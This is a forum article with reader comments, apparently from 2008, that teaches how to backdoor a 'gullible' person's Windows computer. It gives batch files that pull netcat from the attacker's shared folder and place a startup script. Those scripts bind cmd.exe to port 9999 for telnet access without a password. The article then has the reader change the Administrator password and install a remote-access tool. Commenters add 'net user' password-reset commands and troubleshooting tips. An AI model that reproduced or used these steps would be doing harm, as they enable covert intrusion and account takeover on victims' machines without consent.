Hacking a Network Computer

SpOonWiZaRd's Avatar author of Hacking a Network Computer
This is an article on Hacking a Network Computer in Ethical hacking Tips.
I wrote this because it really worked for me a few times and I hope it does for you too, all you need is very a gullible target.

As we all know, a Trojan is very likely to be picked up by AV, what you need is Netcat, netcat opens a port on a computer for access (If used correctly by a batch file you open a port on a target computer). You will need to write a batch file. The batch file to copy netcat on the remote computer will have to be run from the target computer (The person on the target will have to execute the batch file in some way). Open Notepad and type this in:
Code:
@echo off

cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Save the file as a batch file using Notepad.

The next batch file will be used to make sure the port you specified opens up every time windows starts up, you can specify any port you wish. Open Notepad and type:
Code:
@echo off

cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Save the file as a batch file using Notepad, this will be the file that is copied into the startup folder in the previous batch file we wrote. You can bind the batch file to another file and share that file, let the target execute that file so that he can copy netcat and the other batch file onto his/hers computer thus opening port 9999, after port 9999 has been opened you can then use telnet and telnet to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in change the Administrator password for if something happens to your files, the command is this:

net user Administrator newpassword

Now from here you can do what you want, e.g try shutting down the target computer by browsing to his system32 folder and then type in:

shutdown -r -t 10 -c "Hello"

the computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel remotely on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more!

Enjoy.
0
hanleyhansen's Avatar, Join Date: Jan 2008
Pro contributor
Great article! Is it possible to use Netcat to open a port in a local computer when you have limited rights? I would like to open port 3389 that way I can RDC.
0
XXxxImmortalxxXX's Avatar
Invasive contributor
well if the users password isnt administrator type this

Net user

it will display a list of user accounts

once found type in this

net user username newpassword so for example

net user blahh 123456

his new password is 123456

and whola

nice artcile by the way
0
arun_yadav96's Avatar, Join Date: Oct 2008
Newbie Member
Very Nice
0
sundeep.kumar's Avatar, Join Date: Dec 2007
Go4Expert Member
what to do if we get error mesage "Access is Denied" - further it says somewhere around 5 errors occured .....
0
me.unknowwn's Avatar, Join Date: Nov 2008
Newbie Member
I read somewhere that the IP address is being changed regularly by the ISP. I too keep on checking my IP address on regular intervals and found this information to be true although the the part of the IP address remains unchanged.

Here in this case, how one can be sure that writing own's IP address in batch file will always point to our computer ?

What i noticed is at around 5pm I connected to net with IP Address (AAA.BBB.CC.DDD)

I diconnected the net and reconnected immediately and the IP address was now (AAA.BBB.XX.YYY)

Please clarify my point. Does this change in IP made by the ISP each time we log in on the net matters or not in determining our own or target machine's IP address?

(Please don't mind. I am still in learning phase.)
0
NDL's Avatar, Join Date: Oct 2008
NDL
Contributor
Quote:
Originally Posted by XXxxImmortalxxXX
well if the users password isnt administrator type this

Net user

it will display a list of user accounts

once found type in this

net user username newpassword so for example

net user blahh 123456

his new password is 123456

and whola

nice artcile by the way
this only work if we are in a admin account only!!!
0
NDL's Avatar, Join Date: Oct 2008
NDL
Contributor
Quote:
Originally Posted by sundeep.kumar
what to do if we get error mesage "Access is Denied" - further it says somewhere around 5 errors occured .....
bcz u must be trying to access through a limit account
0
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
Vote for this article for Article of the month - October 2008
0
Bhullarz's Avatar
Skilled contributor
If we are trying to open a port and through that we trying to access the machine using TELNET or any other program, even Windows XP's in-built firewall alerts the user to keep the port blocked or unblocked whether you are using ADMIN account or not. Then no fun of executing the batch at the remote location.

Moreover, when I tried to run the command "netcat" , it didn't worked as msg was it is not internet / external comand.I am using Windows XP Service Pack 3.

Last edited by Bhullarz; 18Nov2008 at 05:07..